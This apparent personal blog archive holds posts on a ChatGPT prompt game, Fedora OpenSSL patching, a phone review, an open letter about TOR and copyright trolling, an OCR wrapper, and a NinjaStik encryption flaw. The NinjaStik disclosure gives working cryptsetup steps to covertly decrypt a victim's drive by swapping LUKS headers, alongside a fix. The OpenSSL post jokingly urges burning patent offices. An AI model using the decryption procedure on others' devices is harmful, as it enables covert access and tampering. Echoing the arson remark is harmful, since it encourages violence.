Monday, May 8, 2023

Issue and capability superprompt

I have not been writing in this blog for a while. I have been collecting thoughts.

I thought I'd start small and get to the point with less prosaics. Saves us both time.

I believe this prompt will too, a little now and much more in the future.

Here I'm asking the large language model to relax it's propensity to answer correctly and engage in a game.

It named this conversation: Issue-Capability Brainstorm Game and the chat starts like this.

Let's play a game of academic paper. I have a piece of paper. It says issue on top and capability at the bottom. What am I missing in between. Assuming I could be all knowing and have methods.

Based on the information provided, it seems like you have a game prompt that requires you to fill in the missing content between the "issue" and "capability" labels.

To play this game, you may need to define the specific context or topic you want to explore. For example, if you're interested in exploring a problem within a certain industry or field, you could write the issue as a statement that describes the problem or challenge that needs to be addressed.

Next, you could brainstorm potential capabilities or solutions that could help solve the issue. These capabilities could include methods, tools, technologies, or approaches that could be used to address the problem.

To fill in the missing content, you could then write down a list of possible strategies or solutions that could be used to bridge the gap between the issue and capability. These could include steps or actions that could be taken to implement the identified capabilities and solve the issue at hand.

Overall, this game could be a fun and interactive way to explore different problems and potential solutions within a given context or field.

Here's another:

ChatGPT: Based on the information you have provided, it seems like you are missing a research question or topic for your academic paper. The issue and capability statements provide some context but do not provide a clear direction for your research.

To develop a research question, you could consider the following steps:

1. Identify a broad topic area that you are interested in researching.
2. Conduct a literature review to identify gaps in the existing research on this topic.
3. Refine your topic area based on the literature review and identify a specific research question that you want to answer.
4. Develop a hypothesis or set of hypotheses that you will test through your research.
5. Choose appropriate research methods to collect and analyze data that will help you answer your research question and test your hypotheses.

Once you have a clear research question and methodology, you can begin drafting your academic paper. Your paper should include an introduction that outlines the research question, a literature review that provides context for your study, a methods section that describes how you conducted your research, a results section that presents your findings, and a conclusion that summarizes your research and discusses its implications.

It could be interesting to use prompts like these to load context for problem solving tasks. Just like it works in the data that is used to train the large language model.

Remember, I said no prose. No idea if I kept that promise. Let me know.

Monday, September 7, 2015

Streisand Effect and Microsoft Windows updates

It's been told, that Microsoft behaves in a way that would imply unfamiliarity with the concept known as Streisand Effect. Although I'm not 100% sure this will help block anything, I shall leave it to the reader to discover. I did glance through the source and did not find anything amiss.

So if you want to remove and block all those nasty updates Microsoft is forcing down your throat in the name of customer experience whilst seriously invading on your privacy check out this blog and this repository on Github.

Now I'm left wondering whether this was a really effective backdooring campaign or a tool that is too effective for Microsoft's liking. At least I won't have to worry about this since none of of my systems run Windows.

Monday, January 5, 2015

Decripple OpenSSL on Fedora

I have grown tired of the travesty which is Redhat's inability to get secp256k1 enabled on the OpenSSL package. This has been a problem since 2007. That's 8 years as of now. This elliptic curve is needed for most if not all cryptocurrencies to build and run correctly. The recommended way to deal with this problem has been linking the binaries directly to a separate version of OpenSSL that people usually install from Ringing Liberty repositories. I'm now recommending that you should just patch the shipped version of OpenSSL whenever there's an update to OpenSSL available from Fedora repositories. I know this is bothersome, but it's the easiest way to deal with this issue until Redhat's lawyers get this shit sorted out whenever that may be.

First you need to get the source rpm:
yumdownloader --source --noplugins openssl

then you install the source rpm (version may and probably will differ):
rpm -ivh openssl-1.0.1j-1.fc21.src.rpm

Fetch the files, patch and build:
cd ~/rpmbuild/SPECS/
mv openssl-1.0.1j-decripple-secp256k1.patch ../SOURCES/
patch < openssl.spec.secp256k1.patch
rpmbuild -bb openssl.spec

Then replace the installed openssl-packages on your system:
cd ~/rpmbuild/RPMS/$(uname -p)
yum reinstall ./openssl-*

Now you can build bitcoind, litecoind, potcoind and so on normally by following the building instructions in the sources.
No more fiddling with LD_LIBRARY_PATH, OPENSSL_OPTIONS, LDFLAGS and so on

If you happen to walk in the vicinity of a patent office with a canister of gasoline and the desire to burn buildings, do take pictures. I'd like to hang them on my wall. If you happen to be in a position to vote for abolishing the patent system, please do so. Vote for a political candidate that promises to destroy the patent office. The patent system as it is today does nothing to promote the development of new ideas. In fact it hinders innovation.

Friday, September 26, 2014

OnePlus One review+unboxing

The OnePlus One comes in two varieties: the 16GB(269€) and the 64GB(299€) version. Shipping to Finland is 29,99€. I managed to get an invite to buy the OnePlus One 64GB and bought it with the enthusiasm of an Apple fanboy quickly parting with the total sum of 323,99€. Considering the specs I regarded this as not that much damage.

I placed the order on Thursday and the package arrived next Monday.
The package contains a charger, cable, a pin for opening the sim-card slot and the phone. The phone feels nice to the hand. The sandstone black surface provides a nice grip and makes you think how slippery your previous phones have been. The front is basically all glass with chrome framing. The phone has a classic look to it that doesn't go out of style.

The charger came in it's own box.
The specs of this device are remarkable. The device comes with CyanogenMod 11S based on Android 4.4, it has a quad-core cpu with enough oomph for any application. There's 3GB of RAM in this device. That's only one gigabyte less than on my laptop on which I'm writing this article. If you go with the 64GB version, you are going to have to work hard to hit the memory limit when installing apps. After a months use I managed to fill almost 10GB of the available memory and I have a gigabyte of music and a fed hundred megabytes of pictures. I've been installing a lot of apps and I have put the phone to heavy use. 740 MB is reserved for cached data only.

The 2100 mAh charger does it's job quickly
The OnePlus One has a 5.5 inch display with Full HD resolution. There are two cameras. The 13MP camera on the back can shoot high definition video and has very little noise even in less ideal lighting conditions. The 5MP camera in the front is more than adequate for VoIP. For photographs you might want to use the better camera, but the front camera does the job as well. When capturing your favourite duckface pose, it's easier to use the front camera since you can see the preview on the screen.

The package had some interesting features
The speakers on the phone perform better than I expected from a phone. I'm a heavy user so the battery lasts for about 22hours for me. With the wifi, mobile data, bluetooth, nfc and gps off it would probably last easily more than 26 hours. If you were to use some app that puts the phone in power saving mode, it would last even longer.

This was inside it
Naturally, if you name your product The Flagship Killer, it also has to have LTE, Bluetooth 4, dual band wireless networking and NFC that can handle software card emulation, payment methods and multi-tag support. I haven't been in a situation where the GPS would have taken any time getting a fix on the location.
IMEI and serial blurred on purpose

It's almost as if I have nothing bad to say about this phone. I did have to make some udev-tweaks on my computer in order to get the Media Transfer Protocol working, but I can't really blame the phone for it. There is no SD-card slot, the baseband firmware is proprietary and the battery cannot be removed without some serious surgery. Those are probably the only bad things I have to say about this phone. The worst being the proprietary firmware. It's a shame OnePlus did not go the extra mile to make a truly open phone. I do like that rooting this phone does not affect the warranty.
The screen had protective plastic on it

On Fedora this change made the phone and operating system talk to eachother:

ATTR{idVendor}=="05c6", ATTR{idProduct}=="6764", SYMLINK+="libmtp-%k", ENV{ID_MTP_DEVICE}="1", ENV{ID_MEDIA_PLAYER}="1"

The charger cable is sturdy and sim slot opener is a nice bonus

Sim slot opener for the microsim slot
Oh and unless you turn off the screen gestures, your OnePlus One will wake up on it's own and do all sorts of random things if you keep it in your sweaty pocket while helping a friend move. You can find the gestures settings in the settings main menu.

Ready to charge
I've been using the phone for a month now and I recommend it. It's a fine piece of hardware with the best Android distribution available and it's affordable.

Friday, August 29, 2014

An Open Letter: Is copyright trolling a thing in Finland now?

TL;DR; my response to the law firm representing Hustler

I got a nasty letter(in English here) in the mail. I was being demanded 600 euros for alleged copyright infringement. I operate a TOR exit node and an open wireless network. I'm also an active member of the Pirate Party and have been a municipal election candidate in Turku, Finland.

Someone had been downloading a torrent "This Ain't Game Of Thrones XXX" via TOR or my wireless network. The law firm Hedman Partners, who represent Hustler in Finland seemed to have made the assumption that it's ok to make ultimatums demanding money from someone based on the IP-address alone. By request, I translated my previous post to the best of my ability, so excuse any strange wording. I've organized my two blogs so that I post in English here and my other blog has it's contents in Finnish.

My thoughts are that it's appalling how low someone is willing to go hustling.(pun, get it?)

Your friendly neighbourhood torrorist replied as follows:

Dear lawyer of Hedman Partners 
Your company has sent me a letter stating that I should pay 600 euros for your company, or otherwise what would follow is something that in your letter was referred to as "further measures". Considering the overall tone of the letter and in the fact that it referred to Finnish law and coercive measures by the police, I regard your ultimatum as threatening. As I understood it, I was being demanded monetary compensation for an act I know for certain, I did not do and for which it would be impossible to to prove guilt. What I believe made this demand unlawful in was the fact that I have not committed the offence mentioned.
According to Finnish law, wrongfully forcing someone to dispose of their financial interests is known as blackmail. Threatening to make known one's porn watching habits unless someone coughs up money sounds to me like activities, for which you can get a sentence. I have heard of other cases where people have been threatened with further measures in order to intimidate innocents to part with their money. I am also concerned that other innocent citizens might not have as much time, energy, or wealth to fight back. Because your actions have the potential to cause so much damage to innocent bystanders, I find it morally questionable. I have made a police report.
I have been a TOR exit node operator for many years and I have also been sharing an open wireless network to my neighbours and the occasional passer by in my neighbourhood. In addition, I have occasionally experimented with operating other anonymizing networks. Many other people contribute to the sum of the traffic that goes through my network. Anyone who has access to the Internet can route traffic along the TOR network, and thus it can pass via my connection. Some of those people are journalists, human rights activists and ordinary citizens, on which some party, often their own state, applies censorship. Without the privacy provided by TOR they may lose their lives. 
Naturally with an open network, also the possibility of abuse arises, and in those cases a proper investigation into the matter must be done. A definition of proper investigation is not presuming guilt based on the IP-address alone and sending a bill and an ultimatum to the internet subscription holder. How many cafés have received letters from Hedman Partners? I'm guessing none. I wonder if any servers located in hosting facilities have got the same attention or is their campaign focused only on private people? As stated in your letter, according to Finnish law, ignorance does not release one from guilt even in copyright cases. Information about the services I've been maintaining have been accessible i.a. in my blog ( and in the service. They can be found after a quick search by using my name as query terms or by checking my IP-address from exonerator service. I't will show that my server has been a TOR-exit node at the time of alleged offence. 
However, it is essential that IP-address alone does not identify the offender. A Florida district court judge has already come to this conclusion. An IP-address does not contain any kind of property that could identify the person downloading. You cannot even conclude whether the court has jurisdiction in the area where the downloading happens based on the IP-address alone.( )
In the US copyright trolling or "legal blackmail" (Extortion Letter Scheme) is already a well-known phenomenon. According to a quick Google search, there has already been a sentence in a slightly grosser case.( In similar cases some patent trolls have also been sentenced. Ylivieska district court in Finland has already outlined that the owner has no responsibility for the content of their wireless network traffic. 
How I see it, your actions are not in the best interest of your client, so I wonder what you are trying to achieve. Sure, the copyright holder has the right to seek compensation if the material has been distributed or used without permission, but it is not necessarily a rational action to take. Studies have shown that downloaders also buy copyrighted material. It would be rational of the copyright holders to regard downloading as free marketing that will increase sales. By stating this, my purpose is not to provide any excuses for I need none because of my innocence. I just question the rationality of your actions. 
In any case, I can not in good conscience pay the sum you demand. Although I do watch porn from free legal sites and now also from similar sites that accept Bitcoin, the only way I'm involved in this matter is that I provide services that other people may use. Satire porn isn't my cup of tea anyhow. 
I provide these services for humanitarian reasons and without any compensation. In the event that you're still thinking of trying to get me on accessory charges or something else like that, I'd like to remind you that the only thing you could hope to achieve is making it more difficult for innocent people to take care of their privacy, and so would jeopardize especially those people who are most in need of protection. It is known that well-intentioned restrictions will not hinder the actions of criminals, and I do question the credibility of arguments that imply that knowledge of restrictions could bring a sense of security. 
I am very familiar with IT, and I also know something about law. Therefore, I am very sure that you have no such evidence that would make it in your best interest to pursue this case in court.
However, if you believe that I have committed a crime, please do report a crime or otherwise leave me alone. I wish your customer good luck in experimenting with new types of avenues to profit from their content in a changing world. I just hope that this isn't one of those experiments. 
Waiting for your reply,
Sebastian Mäki
Pirate Party of Finland's local domain in Southwest Finland
Voluntary TOR operator and the operator of the open HackLair network 
This is an open letter published in my blog ( and sent to the email address of Hedman Partners lawyer.

Experiences from past as a TOR exit node operator here and here.(in Finnish)

EDIT: 3.9.2014 If for some reason all the free legal porn in the internet isn't enough for you, you can get more with bitcoin from and other places too.

Monday, October 14, 2013

Tesseract wrapper

GOCR really doesn't seem to recognize Finnish or different kind of fonts out of the box. Tesseract seems to have no problems in recognizing the content I feed it so I wanted to configure XSANE so that it would use Tesseract instead. Setting up XSANE to use Tesseract is not straightforward though. XSANE expects input and output files to be defined as options when Tesseract accepts the input file as first argument and the basename of the output as second parameter. By default XSANE is configured to use GOCR.

In order to make XSANE work with Tesseract the easy option was just to make a wrapper script that accepts options in the way XSANE can provide them. For this purpose I created a wrapper script for Tesseract.

Comparisons of options:


[sebastian@localhost tesseract-wrapper]$ tesseract --help
Usage:tesseract imagename outputbase [-l lang] [-psm pagesegmode] [configfile...]

pagesegmode values are:
0 = Orientation and script detection (OSD) only.
1 = Automatic page segmentation with OSD.
2 = Automatic page segmentation, but no OSD, or OCR
3 = Fully automatic page segmentation, but no OSD. (Default)
4 = Assume a single column of text of variable sizes.
5 = Assume a single uniform block of vertically aligned text.
6 = Assume a single uniform block of text.
7 = Treat the image as a single text line.
8 = Treat the image as a single word.
9 = Treat the image as a single word in a circle.
10 = Treat the image as a single character.
-l lang and/or -psm pagesegmode must occur before anyconfigfile.

Single options:
  -v --version: version info
  --list-langs: list available languages for tesseract engine


[sebastian@localhost tesseract-wrapper]$ gocr --help
 Optical Character Recognition --- gocr 0.49 20100924
 Copyright (C) 2001-2010 Joerg Schulenburg  GPG=1024D/53BDFBE3
 released under the GNU General Public License
 using: gocr [options] pnm_file_name  # use - for stdin
 options (see gocr manual pages for more details):
 -h, --help
 -i name   - input image file (pnm,pgm,pbm,ppm,pcx,...)
 -o name   - output file  (redirection of stdout)
 -e name   - logging file (redirection of stderr)
 -x name   - progress output to fifo (see manual)
 -p name   - database path including final slash (default is ./db/)
 -f fmt    - output format (ISO8859_1 TeX HTML XML UTF8 ASCII)
 -l num    - threshold grey level 0<160<=255 (0 = autodetect)
 -d num    - dust_size (remove small clusters, -1 = autodetect)
 -s num    - spacewidth/dots (0 = autodetect)
 -v num    - verbose (see manual page)
 -c string - list of chars (debugging, see manual)
 -C string - char filter (ex. hexdigits: 0-9A-Fx, only ASCII)
 -m num    - operation modes (bitpattern, see manual)
 -a num    - value of certainty (in percent, 0..100, default=95)
 -u string - output this string for every unrecognized character
 gocr -m 4 text1.pbm                   # do layout analyzis
 gocr -m 130 -p ./database/ text1.pbm  # extend database
 djpeg -pnm -gray text.jpg | gocr -    # use jpeg-file via pipe


Tesseract wrapper

[sebastian@localhost tesseract-wrapper]$ ./tesseract-wrapper --help
./tesseract-wrapper -i inputfile [-o outputfile] [-l lang]
Clone the repo in Github

Saturday, October 5, 2013

NinjaStik encryption vulnerability

The Discovery

(Photo – Flickr Creative Commons: R’eyes)
We in like gadgets. We also like know what we sell to our customers, so some of the guys started checking out a shipment of NinjaStiks.

I was trying to do some other work while discussing the NinjaStik, anonymity, encryption and other stuff with my co-workers. I had one of those days you just can't get yourself to concentrate..

I'm sceptical of any security tool that doesn't come with the exact instructions on how to reproduce it yourself. There are some instructions on how to get started and technical specifications on the NinjaStik site, but elsewhere on the site they also mention some secret ingredients. People are corruptible and imperfect so anything produced by a human should be considered compromised until proven otherwise. I was arguing my point about trusting a third party when the discussion diverted to the process of changing the default password on the LUKS-partition. There were instructions on how to do so and they came with the NinjaStik.

The Problem

Changing the password for the master key does not change the master key. NinjaStik is a kind of product that you would assume is most conveniently produced by writing an existing disk image to a thumb drive. This was confirmed to be the case with the images extracted from the NinjaStiks we had at hand. We took 2 different NinjaStiks and found they used the same master key. We can assume that the rest of the shipment are clones as well. This means that the claim that your data cannot be accessed without supercomputers and a million years to spend is false. In fact it took 30 minutes including reading man pages, making coffee and browsing Facebook(you can guess which one of these was the most time consuming). It was kind of cool to be able to demonstrate the ability to read the contents of my co-workers drive, which according to the marketing by it's producer was an impossible feat.

The fact how simple it was to defeat the encryption on a NinjaStik raises questions and answers some. How competent are the people behind the development of NinjaStik? Should you take it for granted that someone who produced a security product understands all the caveats or even the basic ones? We're going to re-encrypt the NinjaStiks we sell to our customers as well as include instructions on how to do it themselves.

It would be irresponsible of us to tell our customers to trust that we don't keep copies of the master keys ourselves, so I would rather tell the customer to assume we do and then decide if they want to re-encrypt their device. Who knows, if by accident there is a copy of the master key somewhere in our swap partition and we're forced to hand over that data. Of course whether the customer needs to worry about the encryption depends much on what the customer chooses to do with their NinjaStik or in life generally. For some, who purchase this product, it doesn't really matter if it's encrypted or not.

I didn't explore NinjaStik beyond this vulnerability as I haven't had the time.

The Aftermath

We contacted a NinjaStik representative on the 29th of September and they updated their FAQ pretty soon after we explained the vulnerability to them and provided instructions on how to fix the situation. According to the representative they used to build the NinjaStiks with a room full of PCs, but they recently started cloning. He told us they would contact the customers with affected NinjaStiks and immediately return to building them with the room full of PCs method. He also offered to rebuild the NinjaStiks we had and pay the shipping costs which was nice of him although unnecessary as it's not much of an effort for us to do it ourselves. According the representative there aren't many NinjaStiks out there created with the cloning method. We advised them to build NinjaStiks with another boot option that would boot on the first use and re-encrypt the encrypted partition. We then gave them a week to handle the situation on their end before releasing the details of this vulnerability. Still in their updated FAQ they are downplaying the vulnerability:
"Can I change the encryption passphrase?

Yes you can and it is highly recommended – the NinjaStik ships with a default encryption passphrase and a default login password.  Both of these should be changed the first time you use the NinjaStik.  The NinjaStik also includes instructions to change the volume encryption key to further ensure that even we couldn’t gain access to your NinjaStik."
The wording "to further ensure" sounds to me like something you shouldn't really worry about. In reality the opposite is true. It's not even about just them gaining access to the data on your NinjaStik, everyone can. (The different capacity NinjaStiks might use a different master key, but there are copies of the master keys already out there on already purchased sticks.) Also it's more likely that the one trying to decrypt your device is someone you know or the authorities and thus it's more likely that they have access to the same master key as the one used in your batch.

Then there's the issue of cloning being a recent method for production. I don't see many other plausible reasons for them to use a non-cloning process to manufacture an OS on a thumb drive besides lack of knowledge on how to clone disks or the knowledge that it would make the master key on the NinjaStik known. I'm having difficulties understanding how anyone who put this stick together in the first place would not know how to clone them, so I'm inclined to think they knew that they were compromising the encryption, but maybe didn't realize how serious it was or didn't care. But hey, I'm a paranoid tin foil hat person.

The Method

The same master key is used in all NinjaStiks thus any NinjaStik can be decrypted using the known master key or a backup of the LUKS header(it contains the key). I demonstrate here how to gain access using a copy of a header from a fresh NinjaStik. The way LUKS works is that even if you change the password for the keyslot, the actual key used for encryption stays the same. Therefore it is a trivial task to use a known master key(or vanilla header) to decrypt a LUKS device.

Ingredients: 2 NinjaStiks. The victims NinjaStik, which has an unknown password set and one with a known password.

//Extract the LUKS header from the new NinjaStik. Password is "password"
cryptsetup luksHeaderBackup --header-backup-file=vanilla-header.bak /dev/sda2

//Remove the NinjaStik and plug in the victim's NinjaStik
//Optional step: extract the luks header from the second NinjaStik
cryptsetup luksHeaderBackup --header-backup-file=victim-header.bak /dev/sda2

//Replace the header on the victim's NinjaStik
cryptsetup luksHeaderRestore --header-backup-file=vanilla-header.bak /dev/sdb2

//Open the LUKS partition using the default password "password"
cryptsetup luksOpen /dev/sdb2 stick

//Mount the partition
mkdir /mnt/decrypted
mount /dev/mapper/stick /mnt/decrypted

//Achievement unlocked, you can now read and write on the victims NinjaStik and compromise any security measure on the operating system residing on the stick(install keyloggers or whatever)

//Unmount the stick and close the LUKS partition
umount /mnt/decrypted
cryptsetup luksClose stick

//Restore the original header to the stick
cryptsetup luksHeaderRestore --header-backup-file=victim-header.bak /dev/sdb2

//The victims NinjaStik can now again be opened with the password set by the victim.

One alternative approach is to just clone the victims NinjaStik without making any changes to the stick at all. The contents of the victims NinjaStik can be decrypted using an image of the victims NinjaStik and a header with the known password.

The Quick Fix

In order to prevent unauthorized access to a NinjaStik the very first thing a user should do is re-encrypt the luks partition. This can be done after booting the computer with a linux LiveCD. I recommend Fedora Live Desktop. The cryptsetup-reencrypt tool is not preinstalled on the LiveCD, but you can install it from the command line by issuing the command
sudo yum -y install cryptsetup-reencrypt
A quick look led me to the conclusion that cryptsetup-reencrypt tool is not available on Ubuntu 12.04.3 at the moment. After you have booted up the LiveCD open up a terminal, gain root privileges, plug in the NinjaStik and follow these instructions

//identify the last plugged in device

[ 1494.609774] sd 6:0:0:0: [sdf] Write Protect is off
[ 1494.609781] sd 6:0:0:0: [sdf] Mode Sense: 23 00 00 00
[ 1494.610406] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.610409] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.613495] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.613500] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.614011]  sdf: sdf1
[ 1494.616820] sd 6:0:0:0: [sdf] No Caching mode page present
[ 1494.616824] sd 6:0:0:0: [sdf] Assuming drive cache: write through
[ 1494.616827] sd 6:0:0:0: [sdf] Attached SCSI removable disk

//you see here we plugged in the device /dev/sdf
//on the NinjaStik the second partition is the encrypted one 
//thus the partition we want to re-encrypt would be /dev/sdf2

//re-encrypt the partition, it will take some time
cryptsetup-reencrypt -B 32 -c aes-xts-plain64 /dev/yourdevice

Alternatively you can and probably should do these operations on a copy of your NinjaStik image instead and after you have confirmed it works write the resulting image on your NinjaStik.

See more info on re-encryption here:

You should check your master key details with cryptsetup luksDump. The default header we had in our stiks looked like this:

Version:        1
Cipher name:    aes
Cipher mode:    cbc-essiv:sha256
Hash spec:      sha1
Payload offset: 4096
MK bits:        256
MK digest:      bb 49 14 91 26 e1 be 4e 45 2c 9e 81 15 95 45 43 14 1d 9c eb 
MK salt:        09 b3 d0 c4 15 8e cb 0b 4c 20 02 39 a3 71 7c 67 
                61 5c 3a ef 8b 3f f9 87 fb d5 bc 03 b9 eb ca 21 
MK iterations:  18750
UUID:           4f85fbe5-2d73-47e4-a59f-3ae3b080d913

In all cases you should re-encrypt. Even if the master key differs from this one. If you find that your master key matches, leave a comment.

The Solution

NinjaStiks should contain a second boot option to boot the stick into a mode where the encrypted partition is not mounted. After booting is complete the stick should run a script that asks the user for a current password and a new password twice. The script should then re-encrypt the encrypted partition and reboot. At the moment this also requires updating the cryptsetup version to 1.5 as the current available version(1.4.1) on Ubuntu 12.04.3 does not contain the re-encryption tool.

A Conclusion

The worst threat to security is false security.

Originally posted in my blog Semantics

If you want to check whether you have a NinjaStik that was manufactured with a cloning process, paste the sha256 digest of your master key digest in the comments below.

The only thing that can be proven is that if you find two drives with the same master key digest, the corresponding master key is very compromised. If the digests are different, it does not prove anything. There is no guarantee that someone does not know the master key of your NinjaStik the moment you receive it, therefore if you have to be absolutely sure nobody else can open your NinjaStik you have to re-encrypt if yourself. You should also request that the NinjaStik manufacturer provides a first start feature, where the stick is re-encrypted with a random master key before use.

 If you don't understand what this command does, you probably shouldn't be pasting it into your console.(that goes for every tutorial on the interwebs) You should actually never paste stuff directly to your terminal.

//print out the sha256 digest of your master key digest like this
cryptsetup luksDump /dev/yourdevice|grep 'MK digest'|sed -e 's/^MK digest:[[:space:]]*//'|sha256sum
//you should have a hash that is reasonably well anonymized. Paste it in the comments for others to see and compare.

Tip me if you like what you're reading